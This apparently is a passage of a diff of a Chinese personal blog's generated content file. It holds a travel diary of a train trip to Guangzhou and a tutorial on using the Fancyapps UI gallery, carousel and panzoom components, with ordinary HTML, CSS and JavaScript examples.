    遥远的鸽子啊

    ​再见!可爱小雾霾😭!

    06:58 准备上车

    候车室

    ​还有 1 个小时,我下象棋,我一阵乱输,好像没太睡醒😅。

    08:09 G335

    ​车票:G335 08:09 保定东-17:49 广州南。12306 系统好像更新了,不让拆开买学生票了😅,只得全票¥823。这个价格比坐飞机要来的贵,但我觉得从冀大到飞机场挺麻烦的,所以还是就坐这个高铁好了。

    ​啊!京广高铁,贯穿南北,一路向南,9 小时 40 分钟。车上就看提前缓存好的 安州牧《风云南北朝》-哔哩哔哩视频 (bilibili.com),来了解一下之前历史课上几乎没怎么学到的南北朝历史好了。

    ​整个路上大概看了一半,看上去没几个正经君主😅。怪不得历史课都不怎么教,这段历史不助于学生培养正确的唯物史观😅。

    石家庄
    郑州
    长江
    武汉
    长沙南
    湘江
    衡阳东
    铜钱楼
    广州塔

    看来,河南雾霾也挺严重的……

    到了湖北就开始各种山。

    完全没有雾霾了😍!

    进韶关后,山多得跟福建一样😅。

    凡哥我来了😍
    我现在应该离小迷糊挺远的
    阳哥我来了😍

    征南!

    ​一次网页排版的尝试,图 p 了老半天,最后还是感觉不太好,手机上看挤一块了😭。

    ​注:此时背景画的是公元 451 年拓跋焘饮马长江后率军北归后的北魏-刘宋地图,用钢笔工具粗略绘制,仅供参考,难免出现侵犯大魏/大宋疆土的情形🥴。不太确定这个时候的漯河属于北魏还是刘宋。

    17:34 广州塔

    广州塔

    ​最后一批崇山峻岭后,来到了珠三角平原!终于进广州了!

    ​窗外已经可以看到传说中的广州塔😍。

    广州塔

    ​广州塔(英语:Canton Tower)又称广州新电视塔,昵称小蛮腰,其位于中国广东省广州市海珠区(艺洲岛)赤岗塔附近,距离珠江南岸 125 米,与珠江新城、花城广场、海心沙岛隔江相望。广州塔塔身主体高 454 米,天线桅杆高 146 米,总高度 600 米。是中国第一高塔,是国家 AAAA 级旅游景区。

    17:39 铜钱楼

    铜钱楼

    ​窗外已经可以看到传说中的铜钱楼😍。

    广州圆大厦

    ​广州圆大厦位于广东省广州市荔湾区白鹅潭经济圈最南端,是由意大利人约瑟夫设计的一座近似圆形建筑物。大楼将建成 138 米高、外圆直径 146.6 米、内圆直径 47 米的 33 层建筑。
    ​“大楼形状像‘水轮车’,且与珠江水里的倒影形成‘8’字,寓意塑料交易风生水起。2013 年 9 月 24 日,广州“铜钱大楼”经过 10 万元征名,已正式命名为“广州圆大厦”。2013 年 12 月 16 日,广州珠江边的土豪金“圆大厦”正式落成。

    ​广州南站修在了离广州市区非常远的地方……估计是跟福州南站一样,为了发展所谓的新区。

    17:45 广州南站

    下车!

    ​OK,下车。好久没有看见这么蓝的天了😭。

    据说这也号称是亚洲第一大高铁站

    ​去民宿,广州南站-2 号线-公园前站-1 号线-广州东站,¥6。

    ​广州南站之远,以至于去天河区还得再倒腾一个小时的地铁😭。

    ​广州地铁挤得跟北京有得一比了,这就是一线城市🤧!而且这个地铁花样还挺多,走一半还会换个车门开。

    ​感觉广州把本地方言保护得很好,说粤语的人蛮多。

    18:46 终于挤完了地铁!

    看上去物价不高

    ​从地铁站下来看到这个价格让我一度震惊,广州居然物价这么低的🫨???后来觉得还是高得一比😅,但不知道为什么这家在火车站旁边还这么便宜。

    19:03 林和中路

    感觉有点年代了

    ​这个玻璃房让我想起了……十几年前的福州😅。

    ​走到这里的时候突然特别想上厕所,结果还找不到,最后拎着大包小包找了个麦当劳解决了,旁边的服务员小哥投来了异样的眼神🤧。

    19:17 到达民宿!

    法兰西巴洛克样式

    ​走得满身汗,最后到民宿楼下,还是迷路了,不知道怎么上楼🤧。打电话叫民宿阿姨给带上去。

    ​价格¥178+¥188+¥188+¥178-¥32.94-¥73.20=¥625.86!平均一晚上¥156.47。看上去价格还行,装修和卫生也蛮好的,最重要是我看中它离广州东站特别近便于我大早上坐车跑路😬。

    ​结果上来才发现居然是一间套房分成了好多间,各个单间分开租,卫浴是公共的😶,这就是一线城市!选房的时候没看清楚,那好吧就住几个晚上凑合凑合。

    2-珠江

    19:34 馄饨

    ​到民宿简单把包一扔就出发了,第一站——广州塔!

    老广馄饨

    ​出发前一天在保定买好了这天的午饭和晚饭,结果我在高铁上太无聊,没到饭点就把便当吃了,太久没吃东西了还有点饿,决定先吃点夜宵。

    ​本来想去找找有没有肠粉摊,没有找到,找了家馄饨店。这碗馄饨¥18,在保定待久了感觉好贵🤧。

    20:07 上地铁!

    广州地铁线网示意图

    ​看一看广州的地铁交通图,实际情况比这线路更多,可以直接坐地铁去佛山。

    ​你还可以坐地铁去永泰和燕山!但是我选择坐广州东站-1 号线-林和西-APM 线-海心沙,¥2+¥2=¥4。

    ​所谓的 APM 线就是无人驾驶的地铁,中间转车还得走好久。

    20:19 广州塔

    这就是广州塔!

    ​一下车就见到了所谓的广州塔!高 600m,拳打北京中国尊,脚踢天津 117!这是我目前见过的最高的建筑物了🤩。

    20:21 I❤GZ

    自作多情标志

    ​见到了海心沙广场传说中的“I❤GZ”标志🤩,来跟 ZJ 炫耀一番。

    看着就比我爱镇江牛逼😭
    大家都爱 gz😭

    20:30 喷泉表演

    喷泉表演 喷泉表演

    喷泉表演

    ​之前听说 20:30 海心沙广场有喷泉表演!看来我时间把握的不错😎。

    ​然而,我觉得这个喷泉表演没有南昌秋水广场的有造型。

    20:43 人挤人

    人从众𠈌

    ​人实在是太多了!最后还是挤到一个中间位置。结果前面还有个人😅。

    20:45 海心沙岛

    广州塔
    广州塔
    广州塔
    广州塔

    海心沙岛

    ​接下来,按照小红书给的路线,腿去海心桥过江。

    ​这个海心沙岛看上去是之前为 2010 年亚运会而特意建设的。

    20:54 海心桥

    桥上密密麻麻的都是人😭

    ​这个桥只供行人行走。之前还必须预约才能上桥,现在工作日可以直接进,结果人还是多的有点夸张,感觉比天安门的人密度还大🫠。

    珠江
    珠江
    珠江

    珠江

    ​这个珠江看上去也就闽江一般宽度嘛。

    ​最后过江,广州塔站-APM 线-林和西回民宿,¥2。

    21:38 廣州東站

    回民宿開躺!

    ​這個火車站的車牌居然還是繁體字哎!

    ]]>
    + .G{ margin: 5px auto; width: 100%; aspect-ratio: 0.684; position: relative; background: url('1-去程/G335.webp'); background-size: cover; overflow: hidden; }

    前言

            

    ​这是一个姗姗来迟的系列……我想把这个系列做得好看一点,所以有时间慢慢整吧。

    ​7.11 放暑假回家了,按照之前的计划,先去广东玩三天再回去😍。

    正文

    1-去程

    06:44 再见冀大!

    七一路河大新区

    ​虽然说是 8:09 的高铁,但是我已经等不及了😍。

    06:47 巨力大桥

    遥远的鸽子啊

    ​再见!可爱小雾霾😭!

    06:58 准备上车

    候车室

    ​还有 1 个小时,我下象棋,我一阵乱输,好像没太睡醒😅。

    08:09 G335

    ​车票:G335 08:09 保定东-17:49 广州南。12306 系统好像更新了,不让拆开买学生票了😅,只得全票¥823。这个价格比坐飞机要来的贵,但我觉得从冀大到飞机场挺麻烦的,所以还是就坐这个高铁好了。

    ​啊!京广高铁,贯穿南北,一路向南,9 小时 40 分钟。车上就看提前缓存好的 安州牧《风云南北朝》-哔哩哔哩视频 (bilibili.com),来了解一下之前历史课上几乎没怎么学到的南北朝历史好了。

    ​整个路上大概看了一半,看上去没几个正经君主😅。怪不得历史课都不怎么教,这段历史不助于学生培养正确的唯物史观😅。

    石家庄
    郑州
    长江
    武汉
    长沙南
    湘江
    衡阳东
    铜钱楼
    广州塔

    看来,河南雾霾也挺严重的……

    到了湖北就开始各种山。

    完全没有雾霾了😍!

    进韶关后,山多得跟福建一样😅。

    凡哥我来了😍
    我现在应该离小迷糊挺远的
    阳哥我来了😍

    征南!

    ​一次网页排版的尝试,图 p 了老半天,最后还是感觉不太好,手机上看挤一块了😭。

    ​注:此时背景画的是公元 451 年拓跋焘饮马长江后率军北归后的北魏-刘宋地图,用钢笔工具粗略绘制,仅供参考,难免出现侵犯大魏/大宋疆土的情形🥴。不太确定这个时候的漯河属于北魏还是刘宋。

    17:34 广州塔

    广州塔

    ​最后一批崇山峻岭后,来到了珠三角平原!终于进广州了!

    ​窗外已经可以看到传说中的广州塔😍。

    广州塔

    ​广州塔(英语:Canton Tower)又称广州新电视塔,昵称小蛮腰,其位于中国广东省广州市海珠区(艺洲岛)赤岗塔附近,距离珠江南岸 125 米,与珠江新城、花城广场、海心沙岛隔江相望。广州塔塔身主体高 454 米,天线桅杆高 146 米,总高度 600 米。是中国第一高塔,是国家 AAAA 级旅游景区。

    17:39 铜钱楼

    铜钱楼

    ​窗外已经可以看到传说中的铜钱楼😍。

    广州圆大厦

    ​广州圆大厦位于广东省广州市荔湾区白鹅潭经济圈最南端,是由意大利人约瑟夫设计的一座近似圆形建筑物。大楼将建成 138 米高、外圆直径 146.6 米、内圆直径 47 米的 33 层建筑。
​大楼形状像“水轮车”,且与珠江水里的倒影形成“8”字,寓意塑料交易风生水起。2013 年 9 月 24 日,广州“铜钱大楼”经过 10 万元征名,已正式命名为“广州圆大厦”。2013 年 12 月 16 日,广州珠江边的土豪金“圆大厦”正式落成。

    ​广州南站修在了离广州市区非常远的地方……估计是跟福州南站一样,为了发展所谓的新区。

    17:45 广州南站

    下车!

    ​OK,下车。好久没有看见这么蓝的天了😭。

    据说这也号称是亚洲第一大高铁站

    ​去民宿,广州南站-2 号线-公园前站-1 号线-广州东站,¥6。

    ​广州南站之远,以至于去天河区还得再倒腾一个小时的地铁😭。

    ​广州地铁挤得跟北京有得一比了,这就是一线城市🤧!而且这个地铁花样还挺多,走一半还会换个车门开。

    ​感觉广州把本地方言保护得很好,说粤语的人蛮多。

    18:46 终于挤完了地铁!

    看上去物价不高

    ​从地铁站下来看到这个价格让我一度震惊,广州居然物价这么低的🫨???后来觉得还是高得一比😅,但不知道为什么这家在火车站旁边还这么便宜。

    19:03 林和中路

    感觉有点年代了

    ​这个玻璃房让我想起了……十几年前的福州😅。

    ​走到这里的时候突然特别想上厕所,结果还找不到,最后拎着大包小包找了个麦当劳解决了,旁边的服务员小哥投来了异样的眼神🤧。

    19:17 到达民宿!

    法兰西巴洛克样式

    ​走得满身汗,最后到民宿楼下,还是迷路了,不知道怎么上楼🤧。打电话叫民宿阿姨给带上去。

    ​价格¥178+¥188+¥188+¥178-¥32.94-¥73.20=¥625.86!平均一晚上¥156.47。看上去价格还行,装修和卫生也蛮好的,最重要是我看中它离广州东站特别近便于我大早上坐车跑路😬。

    ​结果上来才发现居然是一间套房分成了好多间,各个单间分开租,卫浴是公共的😶,这就是一线城市!选房的时候没看清楚,那好吧就住几个晚上凑合凑合。

    2-珠江

    19:34 馄饨

    ​到民宿简单把包一扔就出发了,第一站——广州塔!

    老广馄饨

    ​出发前一天在保定买好了这天的午饭和晚饭,结果我在高铁上太无聊,没到饭点就把便当吃了,太久没吃东西了还有点饿,决定先吃点夜宵。

    ​本来想去找找有没有肠粉摊,没有找到,找了家馄饨店。这碗馄饨¥18,在保定待久了感觉好贵🤧。

    20:07 上地铁!

    广州地铁线网示意图

    ​看一看广州的地铁交通图,实际情况比这线路更多,可以直接坐地铁去佛山。

    ​你还可以坐地铁去永泰和燕山!但是我选择坐广州东站-1 号线-林和西-APM 线-海心沙,¥2+¥2=¥4。

    ​所谓的 APM 线就是无人驾驶的地铁,中间转车还得走好久。

    20:19 广州塔

    这就是广州塔!

    ​一下车就见到了所谓的广州塔!高 600m,拳打北京中国尊,脚踢天津 117!这是我目前见过的最高的建筑物了🤩。

    20:21 I❤GZ

    自作多情标志

    ​见到了海心沙广场传说中的“I❤GZ”标志🤩,来跟 ZJ 炫耀一番。

    看着就比我爱镇江牛逼😭
    大家都爱 gz😭

    20:30 喷泉表演

    喷泉表演 喷泉表演

    喷泉表演

​之前听说 20:30 海心沙广场有喷泉表演!看来我时间把握得不错😎。

    ​然而,我觉得这个喷泉表演没有南昌秋水广场的有造型。

    20:43 人挤人

    人从众𠈌

    ​人实在是太多了!最后还是挤到一个中间位置。结果前面还有个人😅。

    20:45 海心沙岛

    广州塔
    广州塔
    广州塔
    广州塔

    海心沙岛

    ​接下来,按照小红书给的路线,腿去海心桥过江。

    ​这个海心沙岛看上去是之前为 2010 年亚运会而特意建设的。

    20:54 海心桥

    桥上密密麻麻的都是人😭

​这个桥只供行人行走。之前还必须预约才能上桥,现在工作日可以直接进,结果人还是多得有点夸张,感觉比天安门的人密度还大🫠。

    珠江
    珠江
    珠江

    珠江

    ​这个珠江看上去也就闽江一般宽度嘛。

    ​最后过江,广州塔站-APM 线-林和西回民宿,¥2。

    21:38 廣州東站

    回民宿開躺!

    ​這個火車站的車牌居然還是繁體字哎!

    ]]>
    @@ -1257,7 +1257,7 @@ /posts/Web-fancyapps/ - 资源

    正文

    Fancybox

    引入

​从 Releases · fancyapps/ui (github.com) 引入 fancybox.umd.js 和 fancybox.css:

    <script src="fancybox.umd.js"></script>
    <link rel="stylesheet" href="fancybox.css" />

    ​请注意,这种方法的缺点是,每次要将文件更新到最新版本时,都必须执行此操作。

    ​因此,推荐的方法是使用 NPM 等包管理器或使用 CDN 链接,这些链接将自动使用最新的补丁版本而不会影响您的代码。

    使用

    <a href="222.png" data-fancybox="gallery" data-caption="青玉之爪">
    <img alt="青玉之爪" src="222.png" />
    </a>

    <a href="653.png" data-fancybox="gallery" data-caption="艾雅 · 黑掌">
    <img alt="艾雅 · 黑掌" src="653.png" />
    </a>

    ​即在传统 <img> 显示图片上外包一层 <a>

• <a> 的 href 应与 <img> 的 src 保持一致;
• <a> 的 data-caption 应与 <img> 的 alt 保持一致。

    ​最后在网页的尾部(或是其它合适位置)注册 fancybox:

    Fancybox.bind(document.getElementById("gallery-wrap"), "[data-fancybox]", {
    // Your custom options
    });

    ​可以从 Options | Fancybox - best JavaScript lightbox alternative (fancyapps.com) 获取想要修改的设置 API。

    ​控制 fancybox 的函数:Methods | Fancybox - best JavaScript lightbox alternative (fancyapps.com)

    ​一些执行后的派发事件:Events | Fancybox - best JavaScript lightbox alternative (fancyapps.com)

    ​一般来说,没啥好设置的……

    效果

    青玉之爪 艾雅 · 黑掌

Carousel

引入

    <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/carousel/carousel.umd.js"></script>
    <link
    rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/carousel/carousel.css"
    />

    使用

    ​从 Parallax Slider - StackBlitz 抄一个牛逼的!

    ​创建一个轮播对象 #myCarousel

    <div class="f-carousel" id="myCarousel" style="background: #ff000020;">
    <div class="f-carousel__slide"><img alt="图腾魔像" src="234.png" /><center>当你把一堆图腾绑在一起时,图腾魔像就诞生了。</center></div>
    <div class="f-carousel__slide"><img alt="阴燃电鳗" src="223.png" /><center>用来做鳗鱼饭最合适不过了!</center></div>
    <div class="f-carousel__slide"><img alt="投火无面者" src="477.png" /><center>他的手感热得发烫,百步穿杨技惊四座!</center></div>
    <div class="f-carousel__slide"><img alt="艾雅 · 黑掌" src="653.png" /><center>别看艾雅年纪轻,她可是玉莲帮的实际掌权者。看似天真活泼的少女,转眼之间便能召唤出魔像大军,将敌人统统碾碎!</center></div>
    <div class="f-carousel__slide"><img alt="深渊魔物" src="655.png" /><center>深渊魔物有一奇怪的癖好,就是收集各式各样的萨满祭司图腾。</center></div>
    <div class="f-carousel__slide"><img alt="吉恩 · 格雷迈恩" src="665.png" /><center>“希尔瓦娜斯杀了偶的儿子,偶一定要为他报仇!”</center></div>
    <div class="f-carousel__slide"><img alt="海巨人" src="1088.png" /><center>嗨,巨人!</center></div>
    </div>

    <div class="f-carousel__slide"> 中可以不只是 <img>


​设置好 #myCarousel 的样式:

    .f-carousel__dots>li:before{
    display: none;
    }

    span.f-carousel__dot {
    color: var(--text-primary);
    transition: color 0.5s ease-in-out;
    }

    #myCarousel {
    --f-carousel-slide-width: calc((100% - 60px) / 4);
    --f-carousel-spacing: 20px;

    --f-button-next-pos: 1rem;
    --f-button-prev-pos: 1rem;

    --f-button-width: 44px;
    --f-button-height: 44px;
    --f-button-border-radius: 50%;

    --f-button-color: #fff;
    --f-button-hover-color: #fff;
    --f-button-active-color: #fff;

    --f-button-bg: rgba(0, 0, 0, 0.5);
    --f-button-hover-bg: rgba(0, 0, 0, 0.8);
    --f-button-active-bg: rgba(0, 0, 0, 0.8);

    --f-button-svg-width: 22px;
    --f-button-svg-height: 22px;
    --f-button-svg-stroke-width: 3;
    }
    • --f-carousel-slide-width: calc((100% - 60px) / 4); 可以让一个页面显示中间 3 个页,左右两边显示 2 个半页。

    ​其它的都是设置 UI 样式了。


    ​注册对象:

    const mapRange = (inputLower, inputUpper, outputLower, outputUpper, value) => {
    const INPUT_RANGE = inputUpper - inputLower;
    const OUTPUT_RANGE = outputUpper - outputLower;
    return (
    outputLower + (((value - inputLower) / INPUT_RANGE) * OUTPUT_RANGE || 0)
    );
    };

    new Carousel(document.getElementById('myCarousel'), {
    slidesPerPage: 1,
    dragFree: true,

    Dots: false,
    Panzoom: {
    decelFriction: 0.08,
    },

    on: {
    'Panzoom.beforeTransform': (carousel) => {
    carousel.slides.map((slide) => {
    const progress = carousel.getProgress(slide.index, true);

    const progress1 = mapRange(-4, 4, 50, -50, progress);
    slide.el.style.setProperty('--f-progress1', `${progress1}%`);

    const progress2 = mapRange(-4, 4, 50, -50, 1 - progress);
    slide.el.style.setProperty('--f-progress2', `${progress2}%`);
    });
    },
    },
    });

    ​这段代码可以让每次翻页只翻一个页面宽度。


    ​可以从 Options | Carousel from Fancyapps UI 获取想要修改的设置 API。

    ​控制 carousel 的函数:Methods | Carousel from Fancyapps UI

    ​一些执行后的派发事件:Events | Carousel from Fancyapps UI

    效果

    ​目前看来,这好像跟懒加载 Troy-Yang/hexo-lazyload-image: lazyload image plugin for Hexo. (github.com) 会有点冲突……或许可以在使用 carousel 的时候把懒加载关了。

    ​我说婷婷!这个插件貌似自带懒加载功能,将 src 属性改为 data-lazy-src 属性即可。

    Panzoom

    ​感觉像是非全屏的 fancybox。

    引入

    <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/panzoom/panzoom.umd.js"></script>
    <link
    rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/panzoom/panzoom.css"
    />

    使用

    ​创建对象:

    <div class="f-panzoom" id="myPanzoom" style="background: #ff000020;">
    <img class="f-panzoom__content" src="665.png" alt="吉恩 · 格雷迈恩"/>
    </div>

    ​设置 CSS,如果 panzoom 里的元素实际大小大于所设定的大小,则会在渲染的时候自适应大小,而在鼠标移过去时缩放到原大小。

    #myPanzoom {
    height: 300px;
    }

    ​注册对象:

    const container = document.getElementById("myPanzoom");
    const instance = new Panzoom(container, {
    panMode: 'mousemove',
    mouseMoveFactor: 1.25,
    click: false,
    wheel: false
    });

    container.addEventListener("mouseenter", (event) => {
    if (!event.buttons) {
    instance.zoomToCover(event);
    }
    });

    container.addEventListener("mouseleave", () => {
    instance.zoomToFit();
    });

    演示

    吉恩 · 格雷迈恩

    Panzoom-Toolbar

    引入

​从 @fancyapps/ui CDN by jsDelivr - A free, fast, and reliable Open Source CDN 获取 panzoom.toolbar.esm.js 和 panzoom.toolbar.css 并引入。

    使用

    <div class="f-panzoom" id="myPanzoomToolbar" style="background: #ff000020;">
    <img class="f-panzoom__content" src="1088.png" alt="海巨人"/>
    </div>

    <script>
    const options = {
    Toolbar: {
    display: ["zoomIn", "zoomOut", "toggle1to1", "toggleZoom", "panLeft", "panRight", "panUp", "panDown", "rotateCCW", "rotateCW", "flipX", "flipY", "fitX", "fitY", "reset", "toggleFS"],
    },
    };
    new Panzoom(document.getElementById("myPanzoomToolbar"), options, { Toolbar });
    </script>

    ​可以在 Toolbar 下的 display 中设置想要显示的工具栏按钮。

    演示

    海巨人

    Panzoom-Pins

    引入

​从 @fancyapps/ui CDN by jsDelivr - A free, fast, and reliable Open Source CDN 获取 panzoom.pins.esm.js 和 panzoom.pins.css 并引入。

    使用

    <div class="f-panzoom" id="myPanzoomPins">
    <div class="f-panzoom__viewport">
    <div data-panzoom-pin data-x="48.8%" data-y="16.02%">
    <div title="You Are Here">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 0a7.2 7.2 0 0 0-7.27 7.14C4.73 11.08 12 24 12 24s7.27-12.92 7.27-16.86A7.2 7.2 0 0 0 12 0Z"></path></svg>
    </div>
    </div>
    <img class="f-panzoom__content" src="477.png" alt="投火无面者" />
    </div>
    </div>

    <script>
    new Panzoom(document.getElementById("myPanzoomPins"), {
    // Custom options
    }, {
    Pins
    });
    </script>

​用 data-panzoom-pin 给图片打一个 svg 图钉,感觉作用不大……

    data-x="48.8%" data-y="16.02%" 通过测量得到,案例中将坐标点打在投火无面者的火焰上。

    演示

    投火无面者

    移植一个牛逼的

    <div class="f-carousel" id="parcelSandbox">
    <div class="f-carousel__slide"><img no-lazy alt="图腾魔像" data-lazy-src="234.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="阴燃电鳗" data-lazy-src="223.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="投火无面者" data-lazy-src="477.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="艾雅 · 黑掌" data-lazy-src="653.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="深渊魔物" data-lazy-src="655.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="吉恩 · 格雷迈恩" data-lazy-src="665.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="海巨人" data-lazy-src="1088.png" /></div>
    </div>

    <style>
    #parcelSandbox {
    height: 450px;
    }
    #parcelSandbox .f-carousel__slide {
    display: flex;
    justify-content: center;
    align-items: center;
    width: clamp(100px, 30vw, 200px);
    height: clamp(100px, 40vw, 300px);
    }
    #parcelSandbox img {
    --x: calc(var(--progress) * 100%);
    --y: calc((var(--progress) + 0.15) * 200%);
    --rot: calc(var(--progress) * 60deg);
    object-fit: cover;
    transform: translate(var(--x), var(--y)) rotate(var(--rot));
    transform-origin: 0% 100%;
    filter: drop-shadow(10px 10px 10px #888);
    }
    </style>

    <script>
    const mapRange = (inputLower, inputUpper, outputLower, outputUpper, value) => {
    const INPUT_RANGE = inputUpper - inputLower;
    const OUTPUT_RANGE = outputUpper - outputLower;
    return (
    outputLower + (((value - inputLower) / INPUT_RANGE) * OUTPUT_RANGE || 0)
    );
    };
    new Carousel(document.getElementById('parcelSandbox'), {
    Dots: false,
    slidesPerPage: 1,
    friction: 0.08,
    on: {
    'refresh Panzoom.beforeTransform': (carousel) => {
    carousel.slides.map((slide) => {
    let slide_progress = carousel.getProgress(slide.index, true);
    slide_progress = mapRange(-1, 1, 1 / 6, -(1 / 6), slide_progress);
    slide.el.style.setProperty('--progress', `${slide_progress}`);
    });
    },
    },
    });
    </script>
    ]]>
    + 资源

    正文

    Fancybox

    引入

​从 Releases · fancyapps/ui (github.com) 引入 fancybox.umd.js 和 fancybox.css:

    <script src="fancybox.umd.js"></script>
    <link rel="stylesheet" href="fancybox.css" />

    ​请注意,这种方法的缺点是,每次要将文件更新到最新版本时,都必须执行此操作。

    ​因此,推荐的方法是使用 NPM 等包管理器或使用 CDN 链接,这些链接将自动使用最新的补丁版本而不会影响您的代码。

    使用

    <a href="222.png" data-fancybox="gallery" data-caption="青玉之爪">
    <img alt="青玉之爪" src="222.png" />
    </a>

    <a href="653.png" data-fancybox="gallery" data-caption="艾雅 · 黑掌">
    <img alt="艾雅 · 黑掌" src="653.png" />
    </a>

    ​即在传统 <img> 显示图片上外包一层 <a>

• <a> 的 href 应与 <img> 的 src 保持一致;
• <a> 的 data-caption 应与 <img> 的 alt 保持一致。
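
​懒得手写外层 <a> 的话,也可以用一小段脚本按上述约定自动包装(仅为示意,#gallery-wrap 这个容器选择器是假设的,按自己的页面结构改):

document.querySelectorAll("#gallery-wrap img").forEach((img) => {
  if (img.parentElement.tagName === "A") return; // 已经包过 <a> 的跳过
  const a = document.createElement("a");
  a.href = img.src; // <a> 的 href 与 <img> 的 src 保持一致
  a.dataset.fancybox = "gallery";
  a.dataset.caption = img.alt; // data-caption 与 alt 保持一致
  img.replaceWith(a); // 先占住 img 原来的位置
  a.appendChild(img); // 再把 img 塞回 <a> 里
});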

    ​最后在网页的尾部(或是其它合适位置)注册 fancybox:

    Fancybox.bind(document.getElementById("gallery-wrap"), "[data-fancybox]", {
    // Your custom options
    });

    ​可以从 Options | Fancybox - best JavaScript lightbox alternative (fancyapps.com) 获取想要修改的设置 API。

    ​控制 fancybox 的函数:Methods | Fancybox - best JavaScript lightbox alternative (fancyapps.com)

    ​一些执行后的派发事件:Events | Fancybox - best JavaScript lightbox alternative (fancyapps.com)

    ​一般来说,没啥好设置的……
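
​真要用的话,Methods 页面里的静态方法偶尔派得上用场,比如在自己的逻辑里手动关掉灯箱(示意代码,绑定 q 键只是随手举例,方法名以官方 Methods 页为准):

document.addEventListener("keydown", (e) => {
  if (e.key === "q") {
    Fancybox.close(); // 关闭当前打开的 Fancybox 实例(见官方 Methods 页)
  }
});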

    效果

    青玉之爪 艾雅 · 黑掌

Carousel

引入

    <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/carousel/carousel.umd.js"></script>
    <link
    rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/carousel/carousel.css"
    />

    使用

    ​从 Parallax Slider - StackBlitz 抄一个牛逼的!

    ​创建一个轮播对象 #myCarousel

    <div class="f-carousel" id="myCarousel" style="background: #ff000020;">
    <div class="f-carousel__slide"><img alt="图腾魔像" src="234.png" /><center>当你把一堆图腾绑在一起时,图腾魔像就诞生了。</center></div>
    <div class="f-carousel__slide"><img alt="阴燃电鳗" src="223.png" /><center>用来做鳗鱼饭最合适不过了!</center></div>
    <div class="f-carousel__slide"><img alt="投火无面者" src="477.png" /><center>他的手感热得发烫,百步穿杨技惊四座!</center></div>
    <div class="f-carousel__slide"><img alt="艾雅 · 黑掌" src="653.png" /><center>别看艾雅年纪轻,她可是玉莲帮的实际掌权者。看似天真活泼的少女,转眼之间便能召唤出魔像大军,将敌人统统碾碎!</center></div>
    <div class="f-carousel__slide"><img alt="深渊魔物" src="655.png" /><center>深渊魔物有一奇怪的癖好,就是收集各式各样的萨满祭司图腾。</center></div>
    <div class="f-carousel__slide"><img alt="吉恩 · 格雷迈恩" src="665.png" /><center>“希尔瓦娜斯杀了偶的儿子,偶一定要为他报仇!”</center></div>
    <div class="f-carousel__slide"><img alt="海巨人" src="1088.png" /><center>嗨,巨人!</center></div>
    </div>

    <div class="f-carousel__slide"> 中可以不只是 <img>


​设置好 #myCarousel 的样式:

    .f-carousel__dots>li:before{
    display: none;
    }

    span.f-carousel__dot {
    color: var(--text-primary);
    transition: color 0.5s ease-in-out;
    }

    #myCarousel {
    --f-carousel-slide-width: calc((100% - 60px) / 4);
    --f-carousel-spacing: 20px;

    --f-button-next-pos: 1rem;
    --f-button-prev-pos: 1rem;

    --f-button-width: 44px;
    --f-button-height: 44px;
    --f-button-border-radius: 50%;

    --f-button-color: #fff;
    --f-button-hover-color: #fff;
    --f-button-active-color: #fff;

    --f-button-bg: rgba(0, 0, 0, 0.5);
    --f-button-hover-bg: rgba(0, 0, 0, 0.8);
    --f-button-active-bg: rgba(0, 0, 0, 0.8);

    --f-button-svg-width: 22px;
    --f-button-svg-height: 22px;
    --f-button-svg-stroke-width: 3;
    }
    • --f-carousel-slide-width: calc((100% - 60px) / 4); 可以让一个页面显示中间 3 个页,左右两边显示 2 个半页。

    ​其它的都是设置 UI 样式了。


    ​注册对象:

    const mapRange = (inputLower, inputUpper, outputLower, outputUpper, value) => {
    const INPUT_RANGE = inputUpper - inputLower;
    const OUTPUT_RANGE = outputUpper - outputLower;
    return (
    outputLower + (((value - inputLower) / INPUT_RANGE) * OUTPUT_RANGE || 0)
    );
    };

    new Carousel(document.getElementById('myCarousel'), {
    slidesPerPage: 1,
    dragFree: true,

    Dots: false,
    Panzoom: {
    decelFriction: 0.08,
    },

    on: {
    'Panzoom.beforeTransform': (carousel) => {
    carousel.slides.map((slide) => {
    const progress = carousel.getProgress(slide.index, true);

    const progress1 = mapRange(-4, 4, 50, -50, progress);
    slide.el.style.setProperty('--f-progress1', `${progress1}%`);

    const progress2 = mapRange(-4, 4, 50, -50, 1 - progress);
    slide.el.style.setProperty('--f-progress2', `${progress2}%`);
    });
    },
    },
    });

    ​这段代码可以让每次翻页只翻一个页面宽度。


    ​可以从 Options | Carousel from Fancyapps UI 获取想要修改的设置 API。

    ​控制 carousel 的函数:Methods | Carousel from Fancyapps UI

    ​一些执行后的派发事件:Events | Carousel from Fancyapps UI

    效果

    ​目前看来,这好像跟懒加载 Troy-Yang/hexo-lazyload-image: lazyload image plugin for Hexo. (github.com) 会有点冲突……或许可以在使用 carousel 的时候把懒加载关了。

    ​我说婷婷!这个插件貌似自带懒加载功能,将 src 属性改为 data-lazy-src 属性即可。

    Panzoom

    ​感觉像是非全屏的 fancybox。

    引入

    <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/panzoom/panzoom.umd.js"></script>
    <link
    rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/panzoom/panzoom.css"
    />

    使用

    ​创建对象:

    <div class="f-panzoom" id="myPanzoom" style="background: #ff000020;">
    <img class="f-panzoom__content" src="665.png" alt="吉恩 · 格雷迈恩"/>
    </div>

    ​设置 CSS,如果 panzoom 里的元素实际大小大于所设定的大小,则会在渲染的时候自适应大小,而在鼠标移过去时缩放到原大小。

    #myPanzoom {
    height: 300px;
    }

    ​注册对象:

    const container = document.getElementById("myPanzoom");
    const instance = new Panzoom(container, {
    panMode: 'mousemove',
    mouseMoveFactor: 1.25,
    click: false,
    wheel: false
    });

    container.addEventListener("mouseenter", (event) => {
    if (!event.buttons) {
